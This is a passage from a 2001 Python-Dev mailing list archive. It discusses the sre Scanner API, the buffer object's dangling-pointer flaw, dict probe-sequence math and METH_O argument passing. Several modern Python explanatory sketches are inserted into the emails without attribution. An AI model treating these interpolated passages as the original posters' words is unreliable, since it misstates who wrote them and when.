> bug" has been known for years without any action taken to address it; the
> docs give up in spots and nobody addresses that either (like "The current
> policy seems to state that these characters may be multi-byte characters" --
> well, yes or no?); the builtin buffer() function isn't called anywhere in
> the std test suite; the file object still has an undocumented readinto()
> method that just confuses people who bump into it; and it's so obscure in
> daily life that it appears Guido didn't even think of it when adding
> iterators for the other sequence types.
> 
> I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
> champion it now?  That would be cool.

I believe that nobody really likes the buffer interface enough to
let the world know about it, except maybe Greg ;-)

Even the idea of replacing the usage of strings as data buffers
with buffer objects didn't get very far; common habits are simply
hard to break.

> About combining strop and buffers and strings, don't forget unicodeobject.c:
> that's got oodles of basically duplicate code too.  /F suggested dealing
> with the minor differences via maintaining one code file that gets compiled
> multiple times w/ appropriate #defines.

Hmm, that only saves us a few kB in source, but certainly not
in the object files. 

The better idea would be making the types subclass from a generic 
abstract string object -- I just don't know how this will be 
possible with Guido's type patches. We'll just have to wait, 
I guess.

-- 
Marc-Andre Lemburg


From tim.one@home.com  Sat May 26 22:15:11 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 26 May 2001 17:15:11 -0400
Subject: [Python-Dev] Scanner
In-Reply-To: <3B0FC570.17707787@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKJKEAA.tim.one@home.com>

[Paul Prescod]
> Whatever happened to the sre Scanner? It seemed like a good idea
> but it was not documented

I previously urged /F to document, and Python-Dev to accept, the .lastindex
and .lastgroup match object extensions, but to date <wink> got no response.
Whether to adopt the Scanner class too is fuzzier, since AFAICT almost
nobody has figured out how to use it.

> and it doesn't work for me.

This isn't a code problem, it's a failure to reverse-engineer the
undocumented API <wink>.

> Is it just a case of nobody got around to the documentation or have
> we decided against it?

WRT Scanner, partly the former, nothing of the latter, mostly that there's
been no discussion of the API at all.

WRT lastindex and lastgroup, I think purely the former.

> Here's the code that doesn't work for me:
>
> from sre import Scanner
>
> scanner = Scanner([
>     (r"[a-zA-Z_]\w*", None),
>     (r"\d+\.\d*", None),
>     (r"\d+", None),
>     (r"=|\+|-|\*|/", None),
>     (r"\s+", None),
>     ])

1. Every tokenization regexp must contain exactly one capturing group.
   The lack above is the source of your later TypeError.  Unclear to
   me whether that was the intent, or just the way the code happens to
   work today.

2. When an action is None, the substring matched by the pattern will
   be thrown away.  You need to supply non-None actions if you want
   anything to show up in the token list.
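The mechanism behind both rules can be shown without sre's Scanner. Join the patterns into one alternation and give each alternative exactly one group. The match object's lastindex then selects the action. The sketch below is a hypothetical standalone helper; make_scanner is not part of any library. Unlike the 2001 Scanner, it adds the one group per pattern itself, so the patterns must be written without groups. Its actions receive only the matched text.

```python
import re


def make_scanner(lexicon):
    """Build a scan(text) -> (tokens, tail) function from (pattern, action) pairs.

    Each pattern is wrapped in exactly one capturing group, so m.lastindex
    identifies which alternative matched.  Patterns must not contain
    capturing groups of their own.  An action of None discards the match.
    """
    combined = re.compile("|".join("(%s)" % pattern for pattern, _ in lexicon))
    actions = [action for _, action in lexicon]

    def scan(text):
        tokens = []
        pos = 0
        while pos < len(text):
            m = combined.match(text, pos)
            if m is None or m.end() == pos:    # no match, or no progress
                break
            action = actions[m.lastindex - 1]  # groups are numbered from 1
            if action is not None:
                tokens.append(action(m.group()))
            pos = m.end()
        return tokens, text[pos:]

    return scan


scan = make_scanner([
    (r"[a-zA-Z_]\w*", str),
    (r"\d+\.\d*", str),
    (r"\d+", str),
    (r"=|\+|-|\*|/", str),
    (r"\s+", None),            # ignore whitespace
])
```

Scanning "sum = 3*foo + 312.50 + bar" with this helper yields the same token list as the sre-based rewrite further down, with an empty tail. Unmatched input such as "?" is left in the tail.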

> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>
> Traceback (most recent call last):
>   File "junk.py", line 11, in ?
>     tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>   File "c:\program files\python21\lib\sre.py", line 254, in scan
>     action = self.lexicon[m.lastindex][1]
> TypeError: sequence index must be integer
>
> m.lastindex is None

Here's a working rewrite:

from sre import Scanner

def retrieve(scanner, group):
    return group

scanner = Scanner([
    (r"([a-zA-Z_]\w*)", retrieve),
    (r"(\d+\.\d*)", retrieve),
    (r"(\d+)", retrieve),
    (r"(=|\+|-|\*|/)", retrieve),
    (r"(\s+)", None),  # ignore whitespace
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
print tokens, `tail`

That prints

['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''


In return for that, how about *you* supply a works-on-Windows rewrite of
test_urllib2.py?  You know more about that than anyone, and the test has
been failing for weeks.


From MarkH@ActiveState.com  Sun May 27 03:39:43 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Sun, 27 May 2001 12:39:43 +1000
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>

[Tim]
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?

My take is a little different.  I think people could be convinced to care
about it, and indeed I do.  However, it has one fatal flaw, and no one seems
to know what to do about it.

The problem is the one best demonstrated with the array module - if you get
a pointer to the buffer interface for an array object, but the array then
resizes itself, the buffer pointer dangles.

There have been a few attempts over time to raise the buffer profile, but
this design flaw leaves people scratching their head - it is hard to press
for adoption of a feature that has a known crash hiding away.

However, addressing this problem is difficult.  Guido appears unconvinced
that buffer objects and interfaces are that worthwhile.  It appears no one
else knows how to proceed in the face of this ambivalence - that describes
my take even if no one else's.

The-buffer-is-dead,-long-live-the-buffer ly,

Mark.


From tim.one@home.com  Sun May 27 07:34:53 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 02:34:53 -0400
Subject: [Python-Dev] Next dict crusade
Message-ID: <LNBBLJKPBEHFEDALKOLCKELEKEAA.tim.one@home.com>

I'm still trying to work off the backlog of ignored dict ideas.  Way back
here:

    http://mail.python.org/pipermail/python-dev/2000-December/011085.html

Christian Tismer suggested using polynomial division instead of
multiplication for generating the probe sequence, as a way to get all the
bits of the hash code into play.  The desirability of doing that is
illustrated by, e.g., this program:

def f(keys):
    from time import clock

    d = {}

    s = clock()
    for k in keys:
        d[k] = k
    f = clock()
    print "build time %.3f" % (f-s)

    s = clock()
    for k in keys:
        assert d.has_key(k)
    f = clock()
    print "search time %.3f" % (f-s)

# Excellent performance.
keys = range(20000)
for i in range(5):
    f(keys)

# Terrible performance; > 500x slower.
keys = [i << 16 for i in range(20000)]
for i in range(5):
    f(keys)

Christian had a very clever (cheap and effective) solution:

    Old algorithm (multiplication):
        shift the index left by 1
        if index > mask:
            xor the index with the generator polynomial

    New algorithm (division):
       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

where "index" should really read "increment", and unlike today we do not
mask off any of the bits of the initial increment (and that's what lets
*all* the bits of the hash code come into play; there's no point to doing
this otherwise).
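Below is a direct Python transcription of the two update rules, plus the initial-increment computation with and without masking. It treats each int key as its own hash and assumes a 32768-slot table (mask = 2**15 - 1), purely for illustration. With the shifted keys from the benchmark above, every key starts in the same slot and the masked increments collapse to four values. The unmasked increments stay distinct.

```python
def old_step(incr, mask, poly):
    """Old rule (multiplication): shift left, reduce if we ran past the mask."""
    incr <<= 1
    if incr > mask:
        incr ^= poly
    return incr


def new_step(incr, poly):
    """New rule (division): reduce if the low bit is set, then shift right."""
    if incr & 1:
        incr ^= poly
    return incr >> 1


def initial_incr(h, mask=None):
    """Initial increment: masked as today, or unmasked as proposed."""
    incr = h ^ (h >> 3)
    return incr if mask is None else incr & mask


MASK = 2**15 - 1                          # assumed 32768-slot table
keys = [i << 16 for i in range(20000)]    # the "terrible" keys from above
print(len({k & MASK for k in keys}))                # 1: all keys start in slot 0
print(len({initial_incr(k, MASK) for k in keys}))   # 4 distinct masked increments
print(len({initial_incr(k) for k in keys}))         # 20000 distinct unmasked ones
```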

I've since discovered that it's got a fatal rare flaw:  the new algorithm
can generate a 0 increment, while the old algorithm cannot.

Example:  poly is 131 and hash is 145.  Because we don't mask off any bits
in computing the initial increment, the initial increment is computed as

    incr = hash ^ (hash >> 3) ==
           145 ^ (145 >> 3) ==
           145 ^ 18 ==
           131 ==
           poly

So if we don't hit on the first probe, the new

       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

business sets incr to 0, and the result is an infinite loop (0 is a fixed
point).  I hate to add another branch to this.  As is, the existing branch
in both the old and new ways is of the worst possible kind:  it's taken half
the time, with a pseudo-random distribution.  So there's not a
branch-prediction gimmick on earth it won't fool.
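The failure case can be checked directly. This sketch repeats the new update rule, along with the old one for contrast, and walks through the hash 145 / poly 131 example. For the old rule it relies on a parity argument. A nonzero increment shifted left is even and poly is odd, so the XOR can never cancel to 0.

```python
def old_step(incr, mask, poly):
    # Multiplication-style update (today's code).
    incr <<= 1
    if incr > mask:
        incr ^= poly
    return incr


def new_step(incr, poly):
    # Division-style update from Christian's proposal.
    if incr & 1:
        incr ^= poly
    return incr >> 1


POLY = 131                      # generator polynomial from the example
h = 145
incr = h ^ (h >> 3)             # unmasked initial increment
print(incr)                     # 131, i.e. exactly POLY
print(new_step(incr, POLY))     # 0
print(new_step(0, POLY))        # 0 again: a fixed point, so probing stalls

# The old rule never produces 0 from a nonzero increment (128-slot table).
MASK = 127
print(all(old_step(x, MASK, POLY) != 0 for x in range(1, MASK + 1)))  # True
```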

Note that there's no reasonable way to identify "bad values" for incr before
the loop starts, either -- there's really no way to tell whether incr mod
poly is 0 without a loop to do division steps until incr < poly (if incr <
poly and incr != 0, incr can never become 0, so there's no more need to test
after reaching that point).  Such a "pre loop" would cost more than the
existing loop in most cases, as we usually get out of the existing loop
today on its first iteration.
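Here is a minimal sketch of the "pre loop" described above, using the same division step. It reports whether incr would ever reach 0 and how many steps it took to find out. With a 32-bit hash whose top bit is set and poly 131, it needs 24 or 25 steps. That illustrates the cost argument.

```python
def reaches_zero(incr, poly):
    """Hypothetical pre-loop: would the division step ever turn incr into 0?

    Runs division steps until incr < poly.  From there a nonzero incr can
    never become 0, so the answer is just whether we stopped on 0.
    Returns (answer, number_of_steps_taken).
    """
    steps = 0
    while incr >= poly:
        if incr & 1:
            incr ^= poly
        incr >>= 1
        steps += 1
    return incr == 0, steps


print(reaches_zero(131, 131))           # (True, 1): the example above
print(reaches_zero(145, 131))           # (False, 1)
print(reaches_zero(0xDEADBEEF, 131)[1]) # 24 or 25 steps for a value with bit 31 set
```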

But in that case, what am I worried about <wink>?

time-for-a-checkin-ly y'rs  - tim


From martin@loewis.home.cs.tu-berlin.de  Sun May 27 10:01:14 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 27 May 2001 11:01:14 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com>
Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>

> To call these, the calling mechanism would have to cast these
> to:
> 
> 	foo(void *, void *, void *)
> 	bar(void *, void *, void *, void *, void *)
> 
> Wouldn't this work ?

I think it would work, but I doubt it would save much compared to the
existing approach. The main point of this patch is to improve
efficiency, and (according to Jeremy's analysis), most of the time for
calling a function is spent in PyArg_ParseTuple. So if we replace it
with another interface that also relies on parsing a string, I doubt
we'll improve efficiency.

IOW, I won't implement that approach. If you do, I'd be curious to
hear the results, of course.

Regards,
Martin

P.S. There would be still cases where PyArg_ParseTuple is needed,
e.g. for "O!".


From mal@lemburg.com  Sun May 27 11:26:27 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:26:27 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <3B10D653.4D81E280@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > To call these, the calling mechanism would have to cast these
> > to:
> >
> >       foo(void *, void *, void *)
> >       bar(void *, void *, void *, void *, void *)
> >
> > Wouldn't this work ?
> 
> I think it would work, but I doubt it would save much compared to the
> existing approach. The main point of this patch is to improve
> efficiency, and (according to Jeremy's analysis), most of the time for
> calling a function is spent in PyArg_ParseTuple. So if we replace it
> with another interface that also relies on parsing a string, I doubt
> we'll improve efficiency.

That's the point: we are not replacing PyArg_ParseTuple()
with another parsing mechanism, we are only using PyArg_ParseTuple()
as fallback solution for parser strings for which we don't
provide a special case implementation.

The idea is to simply do a strcmp() (*) for a few common
combinations (like e.g. "O" and "OO") and then provide the
same special-case handling as you do with e.g. METH_O.
The result would be almost the same w/r to performance
and code reduction as with your approach. The only addition
would be using strcmp() instead of a switch statement.

The advantage of this approach is that while you can still
provide special case handling of common parser strings, you
can also provide generic APIs for most other parser strings
by reverting to PyArg_ParseTuple() for these.
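This scheme amounts to an exact-match lookup on the format string, with a generic fallback. Below is a rough Python model. The names are invented, and a dict lookup stands in for the strcmp() calls. The fallback only checks the argument count and pads omitted optionals with None; the real code would call PyArg_ParseTuple() here. The model returns which path was taken so the dispatch is visible.

```python
def fast_O(func, self_obj, args):
    # Special case for "O": pass the single object straight through.
    if len(args) != 1:
        raise TypeError("expected 1 argument, got %d" % len(args))
    return func(self_obj, args[0])


def fast_OO(func, self_obj, args):
    # Special case for "OO": two objects, no format parsing.
    if len(args) != 2:
        raise TypeError("expected 2 arguments, got %d" % len(args))
    return func(self_obj, args[0], args[1])


# Exact-match table standing in for a handful of strcmp() calls.
FAST_PATHS = {"O": fast_O, "OO": fast_OO}


def generic_call(spec, func, self_obj, args):
    # Stand-in for the PyArg_ParseTuple() fallback: arity check only.
    required, _, optional = spec.partition("|")
    total = len(required) + len(optional)
    if not len(required) <= len(args) <= total:
        raise TypeError("expected %d to %d arguments, got %d"
                        % (len(required), total, len(args)))
    padded = list(args) + [None] * (total - len(args))
    return func(self_obj, *padded)


def call_with_format(fmt, func, self_obj, args):
    """Dispatch on the parser string; returns (result, path_taken)."""
    spec = fmt.split(":", 1)[0]          # drop the ":name" suffix
    fast = FAST_PATHS.get(spec)
    if fast is not None:
        return fast(func, self_obj, args), "fast"
    return generic_call(spec, func, self_obj, args), "generic"
```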

> IOW, I won't implement that approach. If you do, I'd be curious to
> hear the results, of course.

I'll see what I can do...

> P.S. There would be still cases where PyArg_ParseTuple is needed,
> e.g. for "O!".

True... can't win 'em all ;-)

-- 
Marc-Andre Lemburg


From mal@lemburg.com  Sun May 27 11:30:48 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:30:48 +0200
Subject: [Python-Dev] strop vs. string
References: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <3B10D758.3741AC2F@lemburg.com>

Mark Hammond wrote:
> 
> [Tim]
> > The buffer object has been neglected for years:  is that because it's in
> > prime shape, or because nobody cares about it enough to maintain it?
> 
> My take is a little different.  I think people could be convinced to care
> about it, and indeed I do.  However, it has one fatal flaw, and no one seems
> to know what to do about it.
> 
> The problem is the one best demonstrated with the array module - if you get
> a pointer to the buffer interface for an array object, but the array then
> resizes itself, the buffer pointer dangles.

I guess there are three ways to "solve" this:

a) mutable types don't implement the getreadbuf interface

b) the getreadbuf interface is complemented with a callback
   interface, so the buffer object can be notified of
   the change

c) calling getreadbuf on a mutable object causes this object
   to become immutable

-- 
Marc-Andre Lemburg


From jeremy@digicool.com  Sun May 27 19:51:26 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:51:26 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
 <3B0E1E2C.4BC121B5@lemburg.com>
 <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
 <3B0ED0C7.F1A665EA@lemburg.com>
 <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
 <3B0F7D44.1A12CE0F@lemburg.com>
 <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <15121.19630.329909.482775@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin@loewis.home.cs.tu-berlin.de> writes:

  MvL> to the existing approach. The main point of this patch is to
  MvL> improve efficiency, and (according to Jeremy's analysis), most
  MvL> of the time for calling a function is spent in
  MvL> PyArg_ParseTuple.

I'd like to qualify this a bit.  What I reported earlier is that the
BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in
PyArg_ParseTuple().  This strikes me as excessive, because it's a
static property of the code.  (One could imagine writing a Python
script that parsed the "O!|is#" format strings and generated
efficient, specialized C code for that format.)
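The script described in that aside can be sketched in a few lines. The generator below is hypothetical and deliberately tiny. It accepts only fixed-arity formats made of "O" and "i". It converts "i" with the Python 2.x PyInt_AsLong() into a C long, without the range check that PyArg_ParseTuple's "i" performs. It emits only the argument-unpacking prologue of a METH_VARARGS function.

```python
def gen_c_prologue(name, fmt):
    """Return C source that unpacks `args` for a format of "O"/"i" codes."""
    if not fmt or any(code not in "Oi" for code in fmt):
        raise ValueError("unsupported format %r" % fmt)
    n = len(fmt)
    ctype = {"O": "PyObject *", "i": "long "}
    out = ["static PyObject *",
           "%s(PyObject *self, PyObject *args)" % name,
           "{"]
    # One local per argument, typed by its format code.
    for i, code in enumerate(fmt):
        out.append("\t%sa%d;" % (ctype[code], i))
    # A single arity check replaces interpreting the format string at runtime.
    out += ["\tif (PyTuple_GET_SIZE(args) != %d) {" % n,
            '\t\tPyErr_SetString(PyExc_TypeError, "%s() takes exactly %d argument%s");'
            % (name, n, "" if n == 1 else "s"),
            "\t\treturn NULL;",
            "\t}"]
    for i, code in enumerate(fmt):
        item = "PyTuple_GET_ITEM(args, %d)" % i
        if code == "O":
            out.append("\ta%d = %s;" % (i, item))       # borrowed reference
        else:
            out.append("\ta%d = PyInt_AsLong(%s);" % (i, item))
            out.append("\tif (a%d == -1 && PyErr_Occurred())" % i)
            out.append("\t\treturn NULL;")
    out += ["\t/* ... the function's real work goes here ... */", "}"]
    return "\n".join(out)


print(gen_c_prologue("builtin_len", "O"))
```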

If we benchmark other programs, particularly those that do more work
in the builtins, the relative cost of the argument processing will be
lower.

Jeremy


From jeremy@digicool.com  Sun May 27 19:55:36 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:55:36 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
 <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
Message-ID: <15121.19880.775931.946049@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim.one@home.com> writes:

  TP> Do METH_O, convert every "O" function to use it, declare
  TP> victory, and enjoy the weekend <wink>.

  TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
  TP>     size-ly y'rs - tim

How is METH_O different than METH_OLDARGS?  

The old-style argument passing is definitely the most efficient for
functions of zero or one arguments.  There's special-case code in
ceval to support these cases -- fast_cfunction() -- primarily
because in these cases the function can be invoked by using arguments
directly from the Python stack instead of copying them to a tuple
first.

Jeremy


From tim.one@home.com  Sun May 27 21:37:43 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 16:37:43 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>

[Jeremy]
> How is METH_O different than METH_OLDARGS?

I have no idea:  can you explain it?  The #define's for these symbols are
uncommented, and it's a mystery to me what they're *supposed* to mean.

> The old-style argument passing is definitely the most efficient for
> functions of zero or one arguments.  There's special-case code in
> ceval to support these cases -- fast_cfunction() -- primarily
> because in these cases the function can be invoked by using arguments
> directly from the Python stack instead of copying them to a tuple
> first.

OK, I'm looking in bltinmodule.c, at builtin_len.  It starts like so:

static PyObject *
builtin_len(PyObject *self, PyObject *args)
{
	PyObject *v;
	long res;

	if (!PyArg_ParseTuple(args, "O:len", &v))
		return NULL;

So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
table is:

	{"len",		builtin_len, 1, len_doc},

That is, it says nothing about the calling convention.  Since C fills in a 0
for missing values, and methodobject.c has

/* Flag passed to newmethodobject */
#define METH_OLDARGS  0x0000
#define METH_VARARGS  0x0001
#define METH_KEYWORDS 0x0002

then doesn't the struct for builtin_len implicitly specify METH_OLDARGS?  But
if that's true, and fast_cfunction() does not create a tuple in this case,
how is it that builtin_len gets a tuple?

Something doesn't add up here.  Or does it?  There's no *reference* to
METH_OLDARGS anywhere in the code base other than its definition and its use
in method tables, so whatever code *keys* off it must be assuming a
hardcoded 0 value for it -- or indeed nothing keys off it at all.

I expect this line in ceval.c is doing the dirty assumption:

			    } else if (flags == 0) {

and should be testing against METH_OLDARGS instead.

But I see that builtin_len is falling into the METH_VARARGS case even though
it wasn't declared that way and it sure looks like METH_OLDARGS
(0) is the default.  Confusing!  Fix it <wink>.


From tim.one@home.com  Sun May 27 21:46:29 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 16:46:29 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>

[Tim, thrashing]
> ...
> So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
> table is:
>
> 	{"len",		builtin_len, 1, len_doc},
>
> That is, it says nothing about the calling convention.

Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define.  So
that explains that.

Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is there
some advantage to using METH_VARARGS in this case?  This gets back to what
these #defines are intended to *mean*, and I still haven't figured that out.


From mwh@python.net  Sun May 27 22:32:48 2001
From: mwh@python.net (Michael Hudson)
Date: Sun, 27 May 2001 22:32:48 +0100 (BST)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>
Message-ID: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>

On Sun, 27 May 2001, Tim Peters wrote:

> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

So you can't do

>>> len(1,2)
2

a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

My impression is that generally METH_VARARGS is saner than METH_OLDARGS
(i.e., more consistent).  It seems the proposed METH_O is basically
METH_OLDARGS + the restriction that there is in fact only one argument, so
we save a tuple allocation over METH_VARARGS, but get argument count
checking over METH_OLDARGS.
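Michael's description of METH_O can be modelled in the same spirit. The sketch below is not Martin's patch, and `call_meth_o` is a hypothetical name. It shows three things: the argument-count and keyword checks happen before the function runs, no tuple is built, and the error message can name the function automatically.

```python
def call_meth_o(name, func, args, kwargs=None):
    """Hypothetical METH_O dispatch: exactly one positional argument,
    handed to `func` directly instead of inside a tuple."""
    if kwargs:
        raise TypeError("%s() takes no keyword arguments" % name)
    if len(args) != 1:
        raise TypeError("%s() takes exactly one argument (%d given)"
                        % (name, len(args)))
    return func(args[0])
```

For example, `call_meth_o("len", len, ("abc",))` returns 3, and a call with two arguments raises TypeError without `len` ever being invoked.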

Cheers,
M.


From tim.one@home.com  Sun May 27 23:49:38 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 18:49:38 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>

[Tim]
> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

[Michael Hudson]
> So you can't do
>
> >>> len(1,2)
> 2
>
> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

If I didn't know better, I'd suspect Python's internal calling conventions
at the start didn't perfectly anticipate all future developments.  Among
other things, looks like it's impossible for a METH_OLDARGS function to
distinguish between being called with more than one argument and being
called with a single tuple argument.
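The ambiguity is easy to reproduce with a small model of the METH_OLDARGS packing rule: zero arguments become NULL, one argument is passed as itself, and several are packed into a tuple. `pack_oldargs` is a hypothetical name used only for this sketch.

```python
def pack_oldargs(*args):
    """Model of what a METH_OLDARGS function receives as `args`."""
    if len(args) == 0:
        return None          # NULL in C
    if len(args) == 1:
        return args[0]       # the single argument itself
    return args              # a tuple of all arguments

# f(1, 2) and f((1, 2)) hand the function the very same value:
assert pack_oldargs(1, 2) == pack_oldargs((1, 2)) == (1, 2)
```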

> My impression is that generally METH_VARARGS is saner than METH_OLDARGS
> (i.e., more consistent).

Yes, METH_OLDARGS does appear to, well, suck.

> It seems the proposed METH_O is basically METH_OLDARGS + the
> restriction that there is in fact only one argument, so we save
> a tuple allocation over METH_VARARGS,

Also, and more importantly, save the PyArg_ParseTuple call on the receiving
end.

> but get argument count checking over METH_OLDARGS.

Which is worth getting.  I'm back to where I started here:

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


PS:  But today I'll add another:  add at least one comment to the code --
this stuff is a bitch to reverse-engineer.


From thomas@xs4all.net  Sun May 27 23:50:58 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:50:58 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100
References: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com> <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <20010528005058.H690@xs4all.nl>

On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote:
> On Sun, 27 May 2001, Tim Peters wrote:

> > Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> > there some advantage to using METH_VARARGS in this case?

> So you can't do

> >>> len(1,2)
> 2

> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

And don't forget the method-specific error message by passing ':len' in the
format string. Of course, this can easily be (and probably should be) done by
passing another argument to whatever parses arguments in METH_O, rather than
invoking string parsing magic every call.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas@xs4all.net  Sun May 27 23:58:30 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:58:30 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400
References: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain> <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>
Message-ID: <20010528005830.I690@xs4all.nl>

On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote:

> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
>     size-ly y'rs  - tim

And recycle a quote a day ;)

> PS:  But today I'll add another:  add at least one comment to the code --
> this stuff is a bitch to reverse-engineer.

But not just any comment, please! The Pine sourcecode is riddled with calls
to 'mm_critical(stream)', and each call I've seen so far is nicely commented
with the utterly useless comment '/* go critical */'.

I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe-
 -what-Pine-actually-tries-to-do-ly y'rs,

-- 
Thomas Wouters <thomas@xs4all.net>



From martin@loewis.home.cs.tu-berlin.de  Sun May 27 23:45:53 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 00:45:53 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from
 Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT))
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
 <3B0E1E2C.4BC121B5@lemburg.com>
 <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
 <3B0ED0C7.F1A665EA@lemburg.com>
 <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
 <3B0F7D44.1A12CE0F@lemburg.com>
 <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com>
Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de>

> I'd like to qualify this a bit.  What I reported earlier is that the
> BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in
> PyArg_ParseTuple().  This strikes me as excessive, because it's a
> static property of the code.  (One could imagine writing a Python
> script that parsed the "O!|is#" format strings and generated
> efficient, specialized C code for that format.)
> 
> If we benchmark other programs, particularly those that do more work
